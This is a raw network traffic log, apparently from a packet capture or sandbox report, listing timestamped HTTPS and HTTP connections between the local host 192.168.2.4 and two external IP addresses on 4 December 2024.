                                                                                                                                                                                  Dec 4, 2024 11:11:29.218481064 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.218697071 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.218703985 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.278978109 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.280677080 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.280715942 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.281876087 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.281886101 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.654059887 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.657129049 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.657182932 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.657285929 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.657310963 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.657320976 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.657325983 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.660192966 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.660240889 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.660339117 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.663974047 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.664011955 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.713514090 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717355967 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717406034 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717422962 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717468023 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717540026 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717560053 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717572927 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.717578888 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.720788956 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.720817089 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.720879078 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.721087933 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.721096992 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.858334064 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.858815908 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.858841896 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.859265089 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.859272003 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.301911116 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.305509090 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.305627108 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.305723906 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.305746078 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.305756092 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.305762053 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.312550068 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.312599897 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.312668085 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.313136101 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.313150883 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.566211939 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.566844940 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.566875935 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.567454100 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.567461014 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.746572018 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.747020006 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.747045994 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:30.747522116 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:30.747528076 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.000683069 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004180908 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004237890 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004300117 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004348993 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004370928 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004384995 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.004391909 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.007059097 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.007106066 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.007190943 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.007332087 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.007349014 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.182920933 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.186968088 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.190377951 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.190423965 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.190445900 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.190457106 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.190463066 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.193176985 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.193221092 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.193305969 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.193465948 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.193480968 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.285300970 CET4974280192.168.2.4178.237.33.50
                                                                                                                                                                                  Dec 4, 2024 11:11:31.389141083 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.390686989 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.390713930 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.391138077 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.391144037 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.436960936 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.438559055 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.438574076 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.438975096 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.438978910 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.825834036 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.828903913 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.828994989 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.829073906 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.829075098 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.829121113 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.829150915 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.833034039 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.833074093 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.833141088 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.833278894 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.833292007 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879481077 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879511118 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879569054 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879585981 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879641056 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879950047 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879964113 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879977942 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.879983902 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.883014917 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.883050919 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:31.883112907 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.883352041 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:31.883369923 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.032629967 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.033283949 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.033308029 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.033854008 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.033859968 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.625710964 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.625780106 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.625830889 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.626051903 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.626070976 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.626081944 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.626086950 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.629759073 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.629808903 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.629899979 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.630148888 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.630172014 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.724153996 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.725121021 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.725150108 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.725580931 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.725593090 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.911309958 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.911938906 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.911957026 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:32.912451029 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:32.912456036 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.158611059 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.162117958 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.162214994 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.162425041 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.162444115 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.162453890 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.162460089 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.165138006 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.165170908 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.165234089 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.165421963 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.165435076 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.346823931 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.346858978 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.346909046 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.346915007 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.347152948 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.347177982 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.347191095 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.347197056 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.347208023 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.347210884 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.349906921 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.349955082 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.350023031 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.350193977 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.350208044 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.551002979 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.554584980 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.554622889 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.555027962 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.555039883 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.665646076 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.668576956 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.668607950 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.669018984 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.669024944 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.985558033 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.989046097 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.989093065 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.989208937 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.989227057 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.989238977 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.989243984 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.992096901 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.992129087 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:33.992194891 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.992512941 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:33.992527962 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.108879089 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.112987995 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113038063 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113046885 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113100052 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113204956 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113220930 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113250971 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.113257885 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.116269112 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.116322994 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.116389036 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.116581917 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.116594076 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.353754997 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.354198933 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.354231119 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.354640961 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.354646921 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.791054964 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.795007944 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.796134949 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.796247959 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.796247959 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.796272039 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.796282053 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.799040079 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.799083948 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.799154997 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.799401045 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.799415112 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.880569935 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.884485006 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.884499073 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:34.884905100 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:34.884908915 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.315318108 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.319538116 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.319592953 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.319674969 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.319690943 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.319704056 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.319709063 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.323271990 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.323307991 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.323363066 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.323530912 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.323544979 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.715027094 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.715536118 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.715569019 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.716135979 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.716141939 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.901305914 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.904568911 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.904591084 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:35.905019999 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:35.905025005 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.150110006 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153413057 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153472900 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153542042 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153577089 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153597116 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153608084 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.153613091 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.156196117 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.156244040 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.156321049 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.156474113 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.156488895 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.347029924 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.351552010 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.351604939 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.351681948 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.351699114 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.351711988 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.351716995 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.354403019 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.354435921 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:36.354526043 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.354685068 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:36.354692936 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.040319920 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.044539928 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.044564962 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.044985056 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.044991970 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.475121021 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.478740931 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.478811979 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.478883028 CET49959443192.168.2.413.107.246.63
